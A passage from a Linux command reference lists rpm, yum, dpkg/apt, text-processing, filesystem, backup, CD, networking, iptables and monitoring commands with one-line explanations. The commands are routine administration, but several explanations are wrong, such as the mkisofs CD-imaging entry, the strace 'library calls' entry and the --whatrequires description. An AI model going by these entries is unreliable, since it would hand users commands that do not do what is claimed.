2. rpm -ivh --nodeps package.rpm: install an rpm package ignoring dependency requests.
3. rpm -U package.rpm: upgrade a rpm package without changing configuration files.
4. rpm -F package.rpm: upgrade a rpm package only if it is installed.
5. rpm -e package_name: remove a rpm package.
6. rpm -qa: show all rpm packages installed on the system.
7. rpm -qa | grep httpd: show all rpm packages with the name “httpd”.
8. rpm -qi package_name: get information on a specific package installed.
9. rpm -qg “System Environment/Daemons”: show rpm packages of a software group.
10. rpm -ql package_name: show list of files given by a rpm package installed.
11. rpm -qc package_name: show configuration files list given by a rpm package installed.
12. rpm -q package_name --whatrequires: show list of dependencies required for a rpm package.
13. rpm -q package_name --whatprovides: show the capability provided by a rpm package.
14. rpm -q package_name --scripts: show scripts started during installation / removal.
15. rpm -q package_name --changelog: display the history of revisions of a rpm package.
16. rpm -qf /etc/httpd/conf/httpd.conf: check which rpm package belongs to a given file.
17. rpm -qp package.rpm -l: show list of files given by a rpm package not yet been installed.
18. rpm --import /media/cdrom/RPM-GPG-KEY: import digital signature public key.
19. rpm --checksig package.rpm: verify the integrity of a package rpm.
20. rpm -qa gpg-pubkey: list the GPG public keys imported into the rpm database, which are used to verify package signatures.
21. rpm -V package_name: check the file size, permissions, type, owner, group, MD5 digest and last modification time.
22. rpm -Va: check all rpm packages installed on the system. Use with caution.
23. rpm -Vp package.rpm: verify a rpm package not yet installed.
24. rpm2cpio package.rpm | cpio --extract --make-directories *bin*: extract executable files from a rpm package.
25. rpm -ivh /usr/src/redhat/RPMS/`arch`/package.rpm: install a package built from a source rpm.
26. rpmbuild --rebuild package_name.src.rpm: build a rpm package from a source rpm.


YUM packages updater (Red Hat, Fedora…etc)

1. yum install package_name: download and install a rpm package.
2. yum localinstall package_name.rpm: This will install an RPM and attempt to resolve all dependencies for you, using your repositories.
3. yum update: update all rpm packages installed on the system.
4. yum update package_name: upgrade a rpm package.
5. yum remove package_name: remove a rpm package.
6. yum list: list all packages installed on the system.
7. yum search package_name: find a package in the rpm repository.
8. yum clean packages: clean a cache erasing downloaded packages.
9. yum clean headers: remove all header files that the system uses to resolve dependencies.
10. yum clean all: delete packages and header files from the cache.

Deb packages (Debian, Ubuntu…etc)

1. dpkg -i package.deb: install / upgrade a deb package.
2. dpkg -r package_name: remove a deb package.
3. dpkg -l: show all deb packages installed on the system.
4. dpkg -l | grep httpd: show all deb packages with the name “httpd”
5. dpkg -s package_name: to obtain information on a specific package installed on the system.
6. dpkg -L package_name: show list of files given by a package installed on the system.
7. dpkg --contents package.deb: show list of files given by a package not yet installed.
8. dpkg -S /bin/ping: check which package owns a given file.

APT packages updater (Debian, Ubuntu …etc)

1. apt-get install package_name: install / upgrade a deb package.
2. apt-cdrom install package_name: install / upgrade a deb package from cdrom.
3. apt-get update: update the package list.
4. apt-get upgrade: update all installed packages.
5. apt-get remove package_name: remove a deb package.
6. apt-get check: check the correct resolution of dependencies.
7. apt-get clean: clean up cache from packages downloaded.
8. apt-cache search searched-package: return the list of packages that match the string ‘searched-package’.

View the contents of a file

1. cat file1: view the contents of a file starting from the first row.
2. tac file1: view the contents of a file starting from the last line.
3. more file1: view the contents of a file, paging through it.
4. less file1: command like ‘more’ but allows both forward and backward movement in the file.
5. head -2 file1: see the first two lines of a file.
6. tail -2 file1: see the last two lines of a file.
7. tail -f /var/log/messages: see in real time what has been added to the file.

Text Manipulation

1. cat file1 file2 .. | command <> file1_in.txt_or_file1_out.txt: general syntax for text manipulation using PIPE, STDIN and STDOUT.
2. cat file1 | command( sed, grep, awk, grep, etc…) > result.txt: general syntax to manipulate a text from a file and write the output to a new file.
3. cat file1 | command( sed, grep, awk, grep, etc…) >> result.txt: general syntax to manipulate a text from a file and append the result to an existing file.
4. grep Aug /var/log/messages: search for the word “Aug” in the file ‘/var/log/messages’.
5. grep ^Aug /var/log/messages: look for lines that begin with “Aug” in the file ‘/var/log/messages’.
6. grep [0-9] /var/log/messages: select all lines in the file ‘/var/log/messages’ that contain numbers.
7. grep Aug -R /var/log/*: search for the string “Aug” in directory ‘/var/log’ and below.
8. sed 's/stringa1/stringa2/g' example.txt: replace “stringa1” with “stringa2” in example.txt.
9. sed '/^$/d' example.txt: delete all blank lines from example.txt.
10. sed '/ *#/d; /^$/d' example.txt: remove comments and blank lines from example.txt.
11. echo 'esempio' | tr '[:lower:]' '[:upper:]': convert lowercase to uppercase.
12. sed -e '1d' result.txt: delete the first line of the file result.txt.
13. sed -n '/stringa1/p': display only lines that contain the word “stringa1”.

Character set and file conversion

1. dos2unix filedos.txt fileunix.txt: convert a text file format from MSDOS to UNIX.
2. unix2dos fileunix.txt filedos.txt: convert a text file format from UNIX to MSDOS.
3. recode ..HTML < page.txt > page.html: convert a text file to html.
4. recode -l | more: show all available format conversions.

Analysis of the file systems

1. badblocks -v /dev/hda1: Check for bad blocks on disk hda1.
2. fsck /dev/hda1: repair / check integrity of a Linux file system on disk hda1.
3. fsck.ext2 /dev/hda1: repair / check integrity of an ext2 file system on disk hda1.
4. e2fsck /dev/hda1: repair / check integrity of an ext2 file system on disk hda1.
5. fsck.ext3 /dev/hda1: repair / check integrity of an ext3 file system on disk hda1.
6. fsck.vfat /dev/hda1: repair / check integrity of a FAT file system on disk hda1.
7. fsck.msdos /dev/hda1: repair / check integrity of an MSDOS file system on disk hda1.
8. dosfsck /dev/hda1: repair / check integrity of a DOS file system on disk hda1.

Formatting a filesystem

1. mkfs /dev/hda1: create a Linux file system on the partition hda1.
2. mke2fs /dev/hda1: create a Linux ext2 file system on the partition hda1.
3. mke2fs -j /dev/hda1: create a Linux file system type ext3 (journal) on hda1 partition.
4. mkfs -t vfat -F 32 /dev/hda1: create a FAT32 file system on hda1.
5. fdformat -n /dev/fd0: format a floppy disk.
6. mkswap /dev/hda3: create a swap file system.

Working with SWAP

1. mkswap /dev/hda3: create a swap file system.
2. swapon /dev/hda3: activate a new swap partition.
3. swapon /dev/hda2 /dev/hdb3: activate two swap partitions.

Backup

1. dump -0aj -f /tmp/home0.bak /home: make a complete backup of the directory ‘/home’.
2. dump -1aj -f /tmp/home0.bak /home: make an incremental backup of the directory ‘/home’.
3. restore -if /tmp/home0.bak: restore a backup interactively.
4. rsync -rogpav --delete /home /tmp: synchronization between directories.
5. rsync -rogpav -e ssh --delete /home ip_address:/tmp: rsync through SSH tunnel.
6. rsync -az -e ssh --delete ip_addr:/home/public /home/local: synchronize a local directory with a remote directory via ssh and compression.
7. rsync -az -e ssh --delete /home/local ip_addr:/home/public: synchronize a remote directory with a local directory via ssh and compression.
8. dd bs=1M if=/dev/hda | gzip | ssh user@ip_addr 'dd of=hda.gz': make a backup of a hard disk on a remote host via ssh.
9. dd if=/dev/sda of=/tmp/file1: save the contents of a hard drive to a file. (In this case the hard drive is “sda” and the file “file1”).
10. tar -Puf backup.tar /home/user: make an incremental backup of the directory ‘/home/user’.
11. ( cd /tmp/local/ && tar c . ) | ssh -C user@ip_addr 'cd /home/share/ && tar x -p': copy the contents of a directory to a remote directory via ssh.
12. ( tar c /home ) | ssh -C user@ip_addr 'cd /home/backup-home && tar x -p': copy a local directory to a remote directory via ssh.
13. tar cf - . | (cd /tmp/backup ; tar xf - ): local copy preserving permissions and links from one directory to another.
14. find /home/user1 -name '*.txt' | xargs cp -av --target-directory=/home/backup/ --parents: find and copy all files with extension ‘.txt’ from one directory to another.
15. find /var/log -name '*.log' | tar cv --files-from=- | bzip2 > log.tar.bz2: find all files with extension ‘.log’ and make a bzip2 archive.
16. dd if=/dev/hda of=/dev/fd0 bs=512 count=1: make a copy of the MBR (Master Boot Record) to floppy.
17. dd if=/dev/fd0 of=/dev/hda bs=512 count=1: restore the backup of the MBR (Master Boot Record) saved on a floppy.

CD-ROM

1. cdrecord -v gracetime=2 dev=/dev/cdrom -eject blank=fast -force: clean or erase a rewritable cd.
2. mkisofs /dev/cdrom > cd.iso: create an iso image of cdrom on disk.
3. mkisofs /dev/cdrom | gzip > cd_iso.gz: create a compressed iso image of cdrom on disk.
4. mkisofs -J -allow-leading-dots -R -V “Label CD” -iso-level 4 -o ./cd.iso data_cd: create an iso image from a directory.
5. cdrecord -v dev=/dev/cdrom cd.iso: burn an iso image.
6. gzip -dc cd_iso.gz | cdrecord dev=/dev/cdrom -: burn a compressed iso image.
7. mount -o loop cd.iso /mnt/iso: mount an iso image.
8. cd-paranoia -B: take songs from a cd to wav files.
9. cd-paranoia -- "-3": take the first 3 songs from a CD to wav files.
10. cdrecord --scanbus: scan the bus to identify the scsi channel.
11. dd if=/dev/hdc | md5sum: run an md5sum on a device such as a cd.

LAN and Wi-Fi

1. ifconfig eth0: show the configuration of an Ethernet network card.
2. ifup eth0: activate an interface ‘eth0’
3. ifdown eth0: disable an interface ‘eth0’
4. ifconfig eth0 192.168.1.1 netmask 255.255.255.0: set an IP address.
5. ifconfig eth0 promisc: configure ‘eth0’ in promiscuous mode to capture packets (sniffing).
6. dhclient eth0: activate the interface ‘eth0’ in dhcp mode.
7. route -n: show route table
8. route add -net 0/0 gw IP_Gateway: configure the default gateway.
9. route add -net 192.168.0.0 netmask 255.255.0.0 gw 192.168.1.1: configure a static route to reach the network ‘192.168.0.0/16’.
10. route del 0/0 gw IP_gateway: remove the static route.
11. echo "1" > /proc/sys/net/ipv4/ip_forward: enable ip routing.
12. hostname: display the system hostname.
13. host www.example.com: look up the host name to resolve it to an IP address (1).
14. nslookup www.example.com: look up the host name to resolve it to an IP address and vice versa (2).
15. ip link show: show the link status of all interfaces.
16. mii-tool eth0: show the link status of ‘eth0’
17. ethtool eth0: display statistics for ‘eth0’.
18. netstat -tup: show all active network connections and their PID.
19. netstat -tupl: show all network services listening on the system and their PIDs.
20. tcpdump tcp port 80: show all HTTP traffic.
21. iwlist scan: show wireless networks.
22. iwconfig eth1: show the configuration of a wireless network card.
23. whois www.example.com: search Whois database.

Microsoft Windows Networks (SAMBA)

1. nbtscan ip_addr: net bios name resolution.
2. nmblookup -A ip_addr: net bios name resolution.
3. smbclient -L ip_addr/hostname: show remote shares of a windows host.


IP Tables (FIREWALL)

1. iptables -t filter -L: show all chains of the filter table.
2. iptables -t nat -L: show all chains of the nat table.
3. iptables -t filter -F: clear all rules from the filter table.
4. iptables -t nat -F: clean all nat table rules.
5. iptables -t filter -X: delete any user-created chain.
6. iptables -t filter -A INPUT -p tcp --dport telnet -j ACCEPT: allow input telnet connections.
7. iptables -t filter -A OUTPUT -p tcp --dport http -j DROP: block output HTTP connections.
8. iptables -t filter -A FORWARD -p tcp --dport pop3 -j ACCEPT: allow POP3 connections on the FORWARD chain.
9. iptables -t filter -A INPUT -j LOG --log-prefix "DROP INPUT": log packets on the INPUT chain.
10. iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE: configure a PAT (Port Address Translation) on eth0, masking outgoing packets.
11. iptables -t nat -A PREROUTING -d 192.168.0.1 -p tcp -m tcp --dport 22 -j DNAT --to-destination 10.0.0.2:22: redirect packets directed from one host to another.

Monitoring and debugging

1. top: show cpu processes.
2. ps -eafw: show cpu processes.
3. ps -e -o pid,args --forest: show Linux processes in a hierarchical manner.
4. pstree: show system processes tree.
5. kill -9 ID_Process: force close and finish process.
6. kill -1 ID_Process: force a process to reload the configuration.
7. lsof -p $$: display a list of files opened by processes.
8. lsof /home/user1: lists open files on a given path by the system.
9. strace -c ls >/dev/null: show system calls made and received by a process.
10. strace -f -e open ls >/dev/null: display library calls.
11. watch -n1 'cat /proc/interrupts': show interrupts in real time.
12. last reboot: show reboot history.
13. lsmod: display the loaded kernel modules.
14. free -m: Displays the status of RAM in megabytes.
15. smartctl -A /dev/hda: monitor the reliability of a hard drive via SMART.
16. smartctl -i /dev/hda: check if SMART is enabled on a hard disk.
17. tail /var/log/dmesg: show events from the kernel boot (loading) process.
18. tail /var/log/messages: show system events.

Other useful commands

1. apropos …keyword: display a list of commands related to the keywords of a program; useful when you know what your program does but do not know the command name.
2. man ping: display the on-line manual pages, for example for the ping command; use the ‘-k’ option to find any related command.
3. whatis …keyword: Displays the description of what the program does.
4. mkbootdisk --device /dev/fd0 `uname -r`: create a bootable floppy.
5. gpg -c file1: encrypt a file with GNU Privacy Guard.
6. gpg file1.gpg: decrypt a file with GNU Privacy Guard.
7. wget -r http://www.example.com: download an entire website.
8. wget -c http://www.example.com/file.iso: download a file with the possibility to stop the download and resume later.
9. echo 'wget -c http://www.example.com/files.iso' | at 09:00: start a download at a given time. In this case it begins at 9 am.
10. ldd /usr/bin/ssh: display the shared libraries required by ssh.
11. alias hh='history': set an alias for a command; here hh = history.
12. chsh: change the login shell.
13. chsh --list-shells: list the available shells; an appropriate command to find out if you have to remote into another terminal.
14. who -a: show who is logged in, and print the time of last system boot, dead processes, system login processes, active processes spawned by init, current runlevel and last system clock change.